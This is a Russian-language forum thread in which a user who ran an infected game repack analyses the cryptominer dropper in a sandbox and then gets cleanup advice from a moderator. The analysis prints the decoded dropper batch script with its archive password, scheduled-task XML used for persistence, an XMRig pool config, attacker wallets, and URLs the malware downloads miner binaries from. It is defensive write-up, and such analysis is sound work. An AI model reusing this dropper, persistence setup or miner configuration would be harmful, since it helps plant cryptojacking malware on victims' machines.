Борьба с МАЙНЕРОМ превратилась в его увлекательный реверс-инженеринг

@Tommy Vercetti · Регистрация: 31.05.2014

Author24 — интернет-сервис помощи студентам

Сразу заранее извиняюсь за длинный пост и много букв.

По собственной банальной глупости и беспечной неосторожности (запустил рандомный файл ради интереса, потому что даже не знал что это вообще такое валялось в "загрузках"...) словил следующий вирус:

Классификация на ВирусТотал:https://www.virustotal.com/gui... /detection
be428da059a9aec1f4e385db03ebf34b90d1f92b653362c8280a7afee250ab45
Task32Main.exe

Отследил его повторно в песочнице. Что мне известно:

Описание:
Вирус вроде бы "составной", что не ново - один заражает и устанавливает майнер, второй, собственно и есть сам майнер.
Trojan.MulDrop21.58322 (Оповещение Microsoft Defender. Но журналы уже пропали то ли после отката системы на прежнее состояние до заражения, то ли после установки Dr.Web Cure It.)
Trojan.Siggen18.17661 (Вроде бы сам классифицировал, когда гуглил и, звучит странно, согласен. Уже и не помню как и почему мне это в голову пришло, но пусть будет.)

Расположение:
C:\Users\WDAGUtilityAccount\AppData\Local\Temp\main\f934w2ghf983h2f23.exe
(Оригинальное имя: Task32Main.exe)

Поведение:
- маскируется, и при открытии диспетчера задач самоуничтожается процесс то ли "AX Rig Miner.exe", то ли "XMRig Miner.exe" (рассмотреть/заморозить не успел, а следы известными мне способами (к примеру банально в файлах Prefetch) найти не удалось - может вы подскажите что-нибудь)
- блокирует панель поиска Windows 10
- вроде бы особо не грузит ЦП и другое, то ли попросту умело маскирует присутствие

Заражение:
При установке Game RePack\Setup.exe
https://www.virustotal.com/gui... cd535f7923
e47915649a47026e1a72b7693b746a4c79ba151cc6be2faa227eedcd535f7923
Setup.exe

Распаковываются следующие подобные файлы (с некоторым небольшим отличием):
https://vms.drweb.ru/virus/?i=25782532

Батник main.bat редставляет из себя с первого взгляда набор кракозябр и иероглифов

main.bat

挦獬਍敀档⁯景൦洊摯⁥㔶ㄬര琊瑩敬朠朳㐳㍧朴㐳㑧″㌨朴㐳㑧栵栶㕪樶㘵⥪਍摭攠瑸慲瑣摥਍敲⁮楦敬戮湩映汩⹥楺൰挊污⁬稷攮數攠映汩⹥楺⁰瀭㌹ㄶ〲㘲〱㌳㈹㈵㌰〰㌹㐱㘳 ‷漭硥牴捡整⁤਍潦⁲氯┠椥椠⁮㜨⴬ⰱ⤱搠⁯ന挊污⁬稷攮數攠攠瑸慲瑣摥是汩彥┥⹩楺⁰漭硥牴捡整൤⤊਍敲⁮楦敬種灩映汩⹥楢൮挊⁤硥牴捡整൤洊癯⁥昢㌹眴朲晨㠹栳昲㌲攮數•⸮യ挊⹤മ爊⁤猯⼠ⁱ硥牴捡整൤愊瑴楲⁢䠫∠㥦㐳㉷桧㥦㌸㉨㉦⸳硥≥਍瑳牡⁴∢∠㥦㐳㉷桧㥦㌸㉨㉦⸳硥≥਍汣൳攊档⁯慌湵档摥✠㥦㐳㉷桧㥦㌸㉨㉦⸳硥❥മ瀊畡敳਍敤⁬ 是⼠ⁱ昢㌹眴朲晨㠹栳昲㌲攮數ഢ

, но при декодировании в Hex-редакторе и тщательном изучении становится понятно, что он делает:

main.bat

��&cls
@echo off
mode 65,10
title g3g34g34g34g43 (34g34g45h6hj56j56j)
md extracted
ren file.bin file.zip
call 7z.exe e file.zip -p936120261033925203009314367 -oextracted
for /l %%i in (7,-1,1) do (
call 7z.exe e extracted/file_%%i.zip -oextracted
)
ren file.zip file.bin
cd extracted
move "f934w2ghf983h2f23.exe" ../
cd..
rd /s /q extracted
attrib +H "f934w2ghf983h2f23.exe"
start "" "f934w2ghf983h2f23.exe"
cls
echo Launched 'f934w2ghf983h2f23.exe'.
pause
del /f /q "f934w2ghf983h2f23.exe"

(Итак, в ларце заяц, в зайце утка, в утке яйцо, в яйце игла, простите, не сдержался.)
Берём отсюда пароль к архиву file.zip и теперь достаём оттуда file_7.zip. Из него AntiAV.data с многословным названием (это обфусцированный код) и file_6.zip.
https://github.com/hXR16F/Anti... 3261834952
Из последнего хватаем file_5, и так N итераций, пока не дойдём до file_1, в котором и лежит собственно та копия вируса f934w2ghf983h2f23.exe.

KillDuplicate.cmd какой-то распространённый скрипт служит, если правильно понял, вроде бы как для запрета запуска копий sfx программы, киляя другие sfx во время своей работы. модифицированного SFX модуль 7-Zip'а для установок и имеет какое-то отношение к 7Z SFX Constructor. Возможно даже является полезной программой, ну или по крайней мере, изначально задумывалась такой, но тут скорее используется просто в составе вируса для его инжекта.

KillDuplicate.cmd

Cd /d %1
Rd "%SfxVarApiPath%"
For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (
If %%I==%2 (
Set /a N+=1
Set PID=%%~J
)
)
If %N% EQU 1 Rd /s /q %1
If %N% GTR 1 TaskKill /pid %PID% /t /f

https://www.virustotal.com/gui... cfc5e5ed78
56c1c88d72e8eebf1eb48f83b82c4586788f33a2eedb2160a7df6ecfc5e5ed78
Сказать, что название и описание файлов странное - это ничего не сказать. Но это меня не остановило. Я запустил на свой страх и риск инатсаллятор Setup.exe (Описание: игры 1.0 Installation , авторские права: rutor) и установил файлы, в.т. числе Запуск игры.exe () Не знаю, о чём я думал, ведь можно сказать был уверен, что там вирус.

Все файлы в папке с установленной "игрой" имеют дату 2.2.2020,
в то время как файл databin.exe (описание Uninstal WinRar, размер 772 Мб, тип SFX-архив с паролем, оригинальное имя Uninstall.exe, файл большой для VirusTotal) там же - 17.08.2023 18:21,
а файлы установки data...bin и Setup.exe в репаке скачаны 17.08.2023 22:30
Ну и также динсталлятор с конфигом, который был создан после окончания установки и имеет соответствующую дату, чист.
Что свидетельствует о том, что в этот непонятный "репак", который использовали для распространения вируса, был внедрён этот самый майнер намного позже.

Также с помощью Hex-редактора (ну или даже обычного блокнота), не декомпилируя исполняемй файл вируса можно найти много интересного:
С помощью какого билдера был собран майнер,

f934w2ghf983h2f23.exe

...C:\Users\admin\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\T ask32Main.pdb...

, в том числе какие win api функции юзает и всякое разное другое.
https://youtu.be/bcuzQlYKVqg?t=290
Из видео мы видим, что подобные майнеры реагируют на открытие диспетчера задач и разные другие утилиты мониторинга процессов, вероятно для того, чтобы самотерминейтить процесс своего исполнения.

Там же видно автора и можно перейти на его гит:

f934w2ghf983h2f23.exe

F o r m 1 wh t t p s : / / g i t h u b . c o m / s i l e n t h a s h i k / W A T C H / r a w / m a i n / W a t c h D o g . e x e sh t t p s : / / g i t h u b . c o m / s i l e n t h a s h i k / l o l / r a w / m a i n / l o l M i n e r . e x e mh t t p s : / / g i t h u b . c o m / s i l e n t h a s h i k / x m r / r a w / m a i n / x m r i g . e x e E T C H A S H )e t c . 2 m i n e r s . c o m : 1 0 1 0 U0 x e 2 1 8 8 b e 6 3 a e 3 4 0 2 4 4 c f 3 C 7 E E 6 9 e 8 E B 4 0 d b A 8 F C 8 4 X M R /p o o l . h a s h v a u l t . p r o : 8 8 8 8 Ђї4 5 j o S d g 8 d i h G b n c F U A a D N 5 3 5 Y L k h N y Q P D F 9 t F U b p H a d 2 S x G g 8 c G h C d P B z j t g 2 y m M c W c e 8 2 n p T D x H Y P h g y Z E T o W y A V f 6 2 W 5 p S 1 l e n t _ H a s h ЂЃh t t p s : / / g i t h u b . c o m / s i l e n t h a s h i k / w i n r i n g / r a w / m a i n / W i n R i n g 0 x 6 4 . s y s Ch t t p s : / / p a s t e b i n . c o m / r a w / A P W 4 U 7 c J D l l h o s t \ H o s t D a t a \ P r o g r a m V 3 ?T a s k 3 2 M a i n . P r o p e r t i e s . R e s o u r c e s

https://github.com/silenthashik/
(Он ещё и открытый доступ сделал, а я первый посмотревший на гитхабе его разделы. Мамкин хакер, но всё равно он меня переиграл...

)

Там видим 4 ветки с вирусами (2 биткоин майнера, троян дроппер, и еще вспомогательная штука для майнера):

https://github.com/silenthashik/

xmrig.exe
WatchDog.exe
lolMiner.exe
WinRing0x64.sys

https://www.virustotal.com/gui... 7fd1bc95bc
miner.bitminer/clearfake
https://www.virustotal.com/gui... 08784a8967
trojan.msil/r06cc0df723
https://www.virustotal.com/gui... 9235389e4e
miner.lolminer/miscx
https://www.virustotal.com/gui... 0b5c160ee5
WinRing0.sys HackTool.VulnDriver/x64!1.D7DB (CLASSIC)

P.S. Dr.Web Secutity Space 12.0 ничего не нашёл по этой части - ерунду всякую банальную выдал, по типу изменённый файл hosts (мною, к слову), или "вирусы" якобы в паре полезных программ, в общем ничего вменяемого.

Вообщем, я пока ещё поковыряться могу. Но каков мой следующий шаг, чтобы получить вашу помощь? Что ещё требуется - логи, AV Block Remover? Есть логи снимка системы в песочнице, а также все звери мною описанные, бережно положенные в запароленный архив. Всё что нужно - скину. Что-то вспомню или найду - добавлю.

Добавлено через 2 часа 10 минут
А вот собственно и кошельки "гения" раздобыл.

logs.uce

ETCHASH
etc.2miners.com:1010
0xe2188be63ae340244cf3C7EE69e8EB40dbA8FC84
ETCHASH
etc.2miners.com:1010
0xe2188be63ae340244cf3C7EE69e8EB40dbA8FC84
XMR
pool.hashvault.pro:8888
45joSdg8dihGbncFUAaDN535YLkhNyQPDF9tFUbpHad2SxGg8cGhCdPBzjtg2ymMcWce82npTDxHYPhg yZEToWyAVf62W5p
S1lent_Hash
S1lent_Hash
cp
https://pastebin.com/raw/APW4U7cJ

Ну не такой уж и дурачок выходит, раз на каждом кошельке намайнил по нескольку десятков тысяч долларов... (если что, осуждаю киберпреступления, никого ни к чему не призываю)

https://any.run/report/9d3024d... fa27be7e24

Добавлено через 1 час 9 минут
Ну и собственно место обитания самого зловреда (помимо папки Temp с его прародителями, откуда произошло его развёртывание), на которое я вышел, используя снимок системы и спаленные автром/копипастером вирусы на гитхабе:

C:\ProgramData\Application Data\Dllhost\

C:\ProgramData\Application Data\Dllhost

winlogson.exe (XMRig miner, xmrig.exe, miner.bitminer/clearfake)
https://www.virustotal.com/gui... 7fd1bc95bc

dllhost.exe (DLL Host Service, Task32Watch.exe, trojan.msil/r06cc0df723)
https://www.virustotal.com/gui... 08784a8967

WinRing0x64.sys (WinRing0, WinRing0.sys,HackTool.VulnDriver/x64!1.D7DB (CLASSIC))
https://www.virustotal.com/gui... 0b5c160ee5

и несколько абсолютно пустых папок:

C:\ProgramData\Application Data\Dllhost

bin
datafiles
RuntimeBrokerLogs
tmp
winSecurityHealthStray

и пустых файлов:

C:\ProgramData\Application Data\Dllhost

dxdiag.bin
dxlog.log
LogSystemData.log
ReportError.bin
SystemErrorReports.log
SystemInterrupts.tmp

Добавлено через 3 часа 3 минуты
(Аналогично в C:\ProgramData\Dllhost и C:\Users\All Users\Dllhost\)

C:\ProgramData\Application Data\HostData\

config.json

config.json

{
"autosave": false,
"cpu": {
"enabled": true,
"max-threads-hint": 50
},
"cuda": false,
"pools": [
{
"coin": "monero",
"url": "pool.hashvault.pro:8888",
"user": "45joSdg8dihGbncFUAaDN535YLkhNyQPDF9tFUbpHad2SxGg8cGhCdPBzjtg2ymMcWce82npTDxHYPh gyZEToWyAVf62W5p.S1lent_Hash/S1lent_Hash",
"tls": true
}
]
}

К слову, .json конфиг-файл c данными о кошельках, адресе пула майнинга перезаписывается каждую минуту - таким образом злоумышленник видимо обезопасил себя от стороннего внесения изменений, а именно смены кошельков на свои.

logs.uce

logs.uce

ETCHASH
etc.2miners.com:1010
0xe2188be63ae340244cf3C7EE69e8EB40dbA8FC84
ETCHASH
etc.2miners.com:1010
0xe2188be63ae340244cf3C7EE69e8EB40dbA8FC84
XMR
pool.hashvault.pro:8888
45joSdg8dihGbncFUAaDN535YLkhNyQPDF9tFUbpHad2SxGg8cGhCdPBzjtg2ymMcWce82npTDxHYPhg yZEToWyAVf62W5p
S1lent_Hash
S1lent_Hash
cp
https://pastebin.com/raw/APW4U7cJ

и пустые папки:

C:\ProgramData\Application Data\HostData

datafiles
RuntimeBrokerLogs
tmp
winSecurityHealthStray

и пустые файлы:

C:\ProgramData\Application Data\HostData

dxlog.log
LogSystemData.log
ReportError.bin
SystemErrorReports.log
SystemInterrupts.tmp

(Аналогично в C:\ProgramData\HostData\, C:\Users\All Users\HostData\)

Также вирус создал не типичную защищенную скрытую папку "Application Data" в "AppData\Local":
C:\Users\WDAGUtilityAccount\AppData\Local\Application Data\Temp\is-9AES1.tmp\
form.exe (Terminal System Info, Tsihost.exe, trojan.msil/msilheracles (Trojan.Win32.Downloader.sa, Msil.Trojan-Downloader.Taskloader.Ijgl))
https://www.virustotal.com/gui... 62c7c9b4bd
7za.exe (7-Zip Standalone Console)

Запароленные архивы по классике - вирус себя защищает, и видимо воспроизводит:
sub.res (trojan.malcrack, Trojan.Win32.MalCrack.a)
form.res
misc.res

Конфиги:
misc.xml

misc.xml

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
<Author></Author>
<Description>System Information Host</Description>
</RegistrationInfo>
<Triggers>
<CalendarTrigger>
<Repetition>
<Interval>PT3H</Interval>
<Duration>P1D</Duration>
<StopAtDurationEnd>false</StopAtDurationEnd>
</Repetition>
<StartBoundary></StartBoundary>
<Enabled>true</Enabled>
<ScheduleByDay>
<DaysInterval>1</DaysInterval>
</ScheduleByDay>
</CalendarTrigger>
</Triggers>
<Principals>
<Principal id="Author">
<UserId></UserId>
<LogonType>InteractiveToken</LogonType>
<RunLevel>HighestAvailable</RunLevel>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
<AllowHardTerminate>true</AllowHardTerminate>
<StartWhenAvailable>true</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<StopOnIdleEnd>false</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>false</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>P3D</ExecutionTimeLimit>
<Priority>7</Priority>
</Settings>
<Actions Context="Author">
<Exec>
<Command></Command>
<Arguments></Arguments>

sub.xml

<?xml version="1.0"?>
<configuration>
<startup useLegacyV2RuntimeActivationPolicy="true">
<supportedRuntime version="v2.0.50727"/>
<supportedRuntime version="v4.0"/>
</startup>
</configuration>

Также здесь присутствует всё та же папка C:\Users\WDAGUtilityAccount\AppData\Local\Application Data\Temp\main с зловредами, упомянутыми в самом начале статьи. Папка является не независимой копией, а жёсткой ссылкой, как и C:\Users\WDAGUtilityAccount\AppData\Local\Temp\main (как, собственно, скорее всего и все предыдущие "копии" других папок - лезть назад и проверять очевидные вещи уже лень.)

Планировщик(?):
C:\Windows\System32\Tasks\NvStray\NvStrayService_bk1508

NvStrayService_bk1508

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
<Date>2024-01-14T17:26:58</Date>
<Author>EB88DDEB-3CC8-4\WDAGUtilityAccount</Author>
<URI>\NvStray\NvStrayService_bk1508</URI>
</RegistrationInfo>
<Triggers>
<TimeTrigger>
<Repetition>
<Interval>PT1H</Interval>
<StopAtDurationEnd>false</StopAtDurationEnd>
</Repetition>
<StartBoundary>2024-01-14T17:26:00</StartBoundary>
<Enabled>true</Enabled>
</TimeTrigger>
</Triggers>
<Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
<AllowHardTerminate>true</AllowHardTerminate>
<StartWhenAvailable>false</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<Duration>PT10M</Duration>
<WaitTimeout>PT1H</WaitTimeout>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>false</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
<Priority>7</Priority>
</Settings>
<Actions Context="Author">
<Exec>
<Command>C:\ProgramData\Dllhost\dllhost.exe</Command>
</Exec>
</Actions>
<Principals>
<Principal id="Author">
<UserId>EB88DDEB-3CC8-4\WDAGUtilityAccount</UserId>
<LogonType>InteractiveToken</LogonType>
<RunLevel>LeastPrivilege</RunLevel>
</Principal>
</Principals>
</Task>

P.S. Это что касается файловой активности, так сказать. Смотрел и снимок-отчет программы SysTrace также и по реестру и процессам, но там нет чего-то особо интересного.

@Sandor · 15.01.2024, 09:26

Здравствуйте!

Сообщение от Tommy Vercetti

каков мой следующий шаг, чтобы получить вашу помощь?

Правила оформления запроса лечения. Если не будет логов, мы отправим вас в эту тему

И не забывайте о правилах форума п.5.7

@Tommy Vercetti · 15.01.2024, 15:38 **[ТС]**

Сообщение от Sandor

Правила оформления запроса лечения. Если не будет логов, мы отправим вас в эту тему

1. Это всё в песочнице делалось. Коллекция логов не удобочитаемая, так как не собрана AVZ в единый репорт, потому что он отказывается работать в виртуальной среде. Я кажется даже забыл сохранить хотя бы эти дробленые логи программ AutoLogger-а из песочницы (я уже завершил сеанс). Но есть логи SysTrace (сравнение снимков реестра, файлов и процессов) и логи Ashampoo Uninstaller. Прикреплю последние упомянутые - там максимально кратко и максимально понятно, в отличии от того же SysTracer-а, где я часов 10 лопатил отчёт. А так же, как уже упоминал, есть сами зловреды, обезвреженные заточенныием в запароленный архив, но их без просьбы/требования администрации в открытый доступ, естественно я не выложу.
2. В основной системе делался откат до момента заражения, и судя по всему вируса нет, т.к. следов вируса в процессах, автозагрузке, драйверах и файловой системе не найдено. Смотрел Anvir-ом. Иметь бы ещё доступ к %AppData%\Application Data - сказал бы наверняка!
3. Вот коллекция логов AutoLogger с основной, не виртуальной машины, прикрепляю.

@Sandor · 15.01.2024, 16:46

Давайте определимся:
Вам интересно просто разобраться в действиях вредоноса?
Или необходимо лечение?

Если первое, перенесу тему в открытый раздел, в котором могут отвечать все.

Добавлено через 43 минуты
По логам - два антивируса:

Dr.Web Security Space
Zemana AntiMalware, версия 3.2.28

Могут конфликтовать друг с другом.

И нежелательное ПО:

Adobe Flash Player 32 PPAPI
Кнопка "Яндекс" на панели задач

которое нужно деинсталлировать.

Больше ничего подозрительного.

@Tommy Vercetti · 15.01.2024, 19:42 **[ТС]**

Давайте определимся:
Вам интересно просто разобраться в действиях вредоноса?
Или необходимо лечение?

Тема создавалась для получения помощи в соответствующем разделе. В процессе я делился своими эвристическими соображениями и информацией, полученной эмпирическим путём, касательно классификации данных вирусов и их поведения.

Во-первых, потому что, это в первую очередь нужно мне самому, и вряд ли кто-то заинтерисован в лечении больше меня. Во-вторых, полагаю, найдутся люди, которым нужна будет подобная помощь и по соответствующим меткам они смогут найти в полном объёме решение проблемы.

Повторюсь, я не знаю, есть ли на данный момент вирус в системе.

Могут конфликтовать друг с другом.
И нежелательное ПО:

Zemana, как по мне, довольно мощный антивирус, хотя порой уж сильно "жесткий". Поэтому я его не использую, он отключен, хоть вы и увидели, что у меня он установлен. Dr.Web установил после заражения, но он меня разочаровпл очень сильно, к слову. А вот во времена Cure It! он был одним из лучших. В общем у меня Windows Defender по дефолту. AVZ раньше очень помогал, я был его искренним фанатом, но помнится в одно время, примерно с выходом Windows 10, он как-то стал становиться всё более бесполезным для меня. Полагаюсь в последнее время только на ручное лечение, а заражаюсь крайне редко, лишь по собственной наглой неосторожности, как можете видеть.

Ну кнопка Яндекс - это полная ерунда, сами понимаете.

P.S. Ссылки virus total открывали с классификациями? Если вдруг это не откат помог, а просто в системе вирусы глубже спрятались, а в песочнице просто не до конца развернулись? Каким АВ просканировать соответствующие категории вирусов (майнер, троян дроппер, троян даунлоадер и т.п.), которые их распознают? Любыми популярными, что в ВТ ругаются? Я хз, м.б. облачный какой-то посоветуете? В безопасном режиме посканить, я не знаю... К слову, а какие сейчас подвижки вообще по части развития АВ ПО в связи с развитием нейросетей? Очень умные эвристические АВ ещё не появились?

P.S. Если ответов и предложений по части лечения не будет, или же я вам попросту надоел – то извините. Буду рад пообщаться с другими участниками, и не против в таком случае предложения по переносу темы в общий раздел.

@Sandor · 16.01.2024, 09:13

Сообщение от Tommy Vercetti

Если вдруг это не откат помог, а просто в системе вирусы глубже спрятались

Сделаем ещё несколько шагов.

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
(Если не помещаются, упакуйте в архив).
Подробнее читайте в этом руководстве.

@Tommy Vercetti · 16.01.2024, 17:25 **[ТС]**

Сообщение от Sandor

Скачайте Farbar Recovery Scan Tool

https://www.virustotal.com/gui... /detection
Ноунейм АВ ругается.

Буквально не долго просканировало, и такое впечатление, что зависло с надписью "Сканирование Системные ошибки: 244493", ошибок не прибавляется... и так почти 5 часов сканировало. Систему, на ножки поставило, ни диспетчер не запустишь, ни проводник:
Explorer.exe: Ошибка при системном вызове
C:\Users\Сергей Сергеевич\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\File Explorer.lnk: Нет приложения, сопоставленного с этим файлом для выполнения этого действия. Установите приложение или, если оно уже установлено, создайте связь на странице параметров приложений по умолчанию.
Уведомление: Звук: Возникли проблемы со звуком? Откройте средство устранения неполадок со звуком.
Короче видимо ваше приложение схавало всю оперативку и вообще всё что можно было. Пришлось сделать принудительную перезагрузку.

Добавлено через 13 минут
Sandor, ладно, бог с этими логами пока что. Это очень важно, возможно. Можете ответить на такой вопрос, пожалуйста? Вот если в установщике был вирус, и он заразил какую-то программу, уже имеющуюся на компе, к примеру WinRar, а потом я откатился к состоянию до установки, то WinRar останется заражённым?

@Sandor · 16.01.2024, 17:29

Сообщение от Tommy Vercetti

Ноунейм АВ ругается

Не удивительно, т.к. программа часто обновляется и подобные ложные срабатывания допустимы.

5 часов, конечно, долго.
Попробуйте ещё раз запустить и дождаться окончания скана.

Добавлено через 1 минуту

Сообщение от Tommy Vercetti

WinRar останется заражённым?

Если откат на контрольную точку средствами системы - да, останется.
Если восстановление ранее созданного образа диска (сторонними программами типа Акронис) - нет.

Добавлено через 48 секунд

Сообщение от Sandor

ещё раз запустить

Предварительно всё остальное завершите по максимуму, в т.ч. защитное ПО.

@Tommy Vercetti · 16.01.2024, 18:51 **[ТС]**

Сообщение от Sandor

ещё раз запустить

Ну, он может даже просканировал всё, хотя логи подозрительно маленькие. Всё-таки повторно запустить придётся наверное, потому что скорее всего они не полные из-за принудительного завершения. Ну что-то стоящего в логах я не нашёл, к слову, кроме того, что мне и самому известно - к примеру пару драйверов недавно слетели ни с того ни с сего, и ещё всякое, что в логах тоже видно.

Решил попробовать Gridin Soft Antimalware - он даже что-то смог найти, а не только банальщину. Позже вернусь к нему. А сейчас посканирую ещё MalwareBytes-ом. А вообще, насколько я понимаю, Dr.Web Security Space же желательно отключать, чтобы АВ не конфликтовали и процесс сканирования не затягивался? Вообще Dr.Web не дружелюбный какой-то - другие АВ лезут в системные файлы для каких-то своих нужд, а он их по рукам бьёт

@Sandor · 17.01.2024, 09:23

Сообщение от Tommy Vercetti

насколько я понимаю, Dr.Web Security Space же желательно отключать, чтобы АВ не конфликтовали и процесс сканирования не затягивался?

Правильно понимаете.

В Malwarebytes удалите (поместите в карантин) только

Код

Adware.OxyPumper, C:\$RECYCLE.BIN\S-1-5-21-2208526547-2125225514-2087499504-1001\$RWPVSR8.RAR, Проигнорировано пользователем, 5610, 1213367, 1.0.79698, , ame, , 8857BB623D29D22BDB98517C6A6EE197, 424C0EDA3F1C775A684807BF404E2D188CED585DA23969F338B1CB9A35A3B7A7

Логи Farbar не переделывали? Addition.txt неполный.

@Tommy Vercetti · 17.01.2024, 11:32 **[ТС]**

В Malwarebytes удалите (поместите в карантин)

Да, раньше уже удалил, просто корзину не очистил. Это архив с тем самым вирусом, о котором упоминал в первом сообщении, на который я пароль забыл поставить вначале.

Логи Farbar не переделывали?

Нет. Неполные, вероятно из-за зависания и аварийной перезагрузки. Поставлю на сканирование ещё раз с отключенным Dr.Web.

@Tommy Vercetti · 17.01.2024, 14:32 **[ТС]**

Gridinsoft Anti-Malware 4.3.4 лютый - очень много угроз обнаружил, и это по большей части, видимо, не рекламный ход разработчика или ложные срабатывания, к сожалению. В том числе и остатки майнера того из корзины (см. вложение). Жаль лицензия очень дорогая, а пробная на 6 дней не активируется из-за какой-то ошибки сервера. Даже логи нормально посмотреть нельзя.
UPD:
А нет, нашёл - можно

@Tommy Vercetti · 17.01.2024, 14:42 **[ТС]**

UPD:
А нет, извиняюсь, нашёл - можно

@Sandor · 17.01.2024, 15:01

Сообщение от Tommy Vercetti

очень много угроз обнаружил, и это по большей части, видимо, не рекламный ход разработчика или ложные срабатывания

Интереса ради можете эти все его срабатывания проверить на virustotal.

Торрент клиент, ссылки, маил.ру и яндекс, репаки

Да, в каком-то смысле можно сказать, что использование всего этого (кроме браузеров) может привести к заражению.
На мой взгляд - ничего критически опасного.

@Tommy Vercetti · 17.01.2024, 19:15 **[ТС]**

Да, я думаю так же. Пожалуй, хватит играть в "бой с тенью". искать мифические вирус. Остался бы какой майнер - грузил бы мою слабенькую машинку до предела, даже в сайлент-режиме. Вам спасибо. Помню вас с Тирексом ещё с былых времён. Радует, что вы до сих пор в строю, и помогаете человекам

@Sandor 21981 / 15761 / 3046 Регистрация: 08.10.2012 Сообщений: 64,054
	15.01.2024, 09:26	2
	Здравствуйте! Сообщение от Tommy Vercetti каков мой следующий шаг, чтобы получить вашу помощь? Правила оформления запроса лечения. Если не будет логов, мы отправим вас в эту тему И не забывайте о правилах форума п.5.7 0

@Sandor 21981 / 15761 / 3046 Регистрация: 08.10.2012 Сообщений: 64,054
	15.01.2024, 16:46	4
	Давайте определимся: Вам интересно просто разобраться в действиях вредоноса? Или необходимо лечение? Если первое, перенесу тему в открытый раздел, в котором могут отвечать все. Добавлено через 43 минуты По логам - два антивируса: Dr.Web Security Space Zemana AntiMalware, версия 3.2.28 Могут конфликтовать друг с другом. И нежелательное ПО: Adobe Flash Player 32 PPAPI Кнопка "Яндекс" на панели задач которое нужно деинсталлировать. Больше ничего подозрительного. 0

@Tommy Vercetti 1 / 1 / 1 Регистрация: 31.05.2014 Сообщений: 42
	15.01.2024, 19:42 [ТС]	5
	Давайте определимся: Вам интересно просто разобраться в действиях вредоноса? Или необходимо лечение? Тема создавалась для получения помощи в соответствующем разделе. В процессе я делился своими эвристическими соображениями и информацией, полученной эмпирическим путём, касательно классификации данных вирусов и их поведения. Во-первых, потому что, это в первую очередь нужно мне самому, и вряд ли кто-то заинтерисован в лечении больше меня. Во-вторых, полагаю, найдутся люди, которым нужна будет подобная помощь и по соответствующим меткам они смогут найти в полном объёме решение проблемы. Повторюсь, я не знаю, есть ли на данный момент вирус в системе. Могут конфликтовать друг с другом. И нежелательное ПО: Zemana, как по мне, довольно мощный антивирус, хотя порой уж сильно "жесткий". Поэтому я его не использую, он отключен, хоть вы и увидели, что у меня он установлен. Dr.Web установил после заражения, но он меня разочаровпл очень сильно, к слову. А вот во времена Cure It! он был одним из лучших. В общем у меня Windows Defender по дефолту. AVZ раньше очень помогал, я был его искренним фанатом, но помнится в одно время, примерно с выходом Windows 10, он как-то стал становиться всё более бесполезным для меня. Полагаюсь в последнее время только на ручное лечение, а заражаюсь крайне редко, лишь по собственной наглой неосторожности, как можете видеть. Ну кнопка Яндекс - это полная ерунда, сами понимаете. P.S. Ссылки virus total открывали с классификациями? Если вдруг это не откат помог, а просто в системе вирусы глубже спрятались, а в песочнице просто не до конца развернулись? Каким АВ просканировать соответствующие категории вирусов (майнер, троян дроппер, троян даунлоадер и т.п.), которые их распознают? Любыми популярными, что в ВТ ругаются? Я хз, м.б. облачный какой-то посоветуете? В безопасном режиме посканить, я не знаю... К слову, а какие сейчас подвижки вообще по части развития АВ ПО в связи с развитием нейросетей? Очень умные эвристические АВ ещё не появились? P.S. Если ответов и предложений по части лечения не будет, или же я вам попросту надоел – то извините. Буду рад пообщаться с другими участниками, и не против в таком случае предложения по переносу темы в общий раздел. 0

@Sandor 21981 / 15761 / 3046 Регистрация: 08.10.2012 Сообщений: 64,054
	16.01.2024, 09:13	6
	Сообщение от Tommy Vercetti Если вдруг это не откат помог, а просто в системе вирусы глубже спрятались Сделаем ещё несколько шагов. Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе. Запустите программу. Когда программа запустится, нажмите Да для соглашения с предупреждением. Нажмите кнопку Сканировать (Scan). После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению. (Если не помещаются, упакуйте в архив). Подробнее читайте в этом руководстве. 0

@Tommy Vercetti 1 / 1 / 1 Регистрация: 31.05.2014 Сообщений: 42
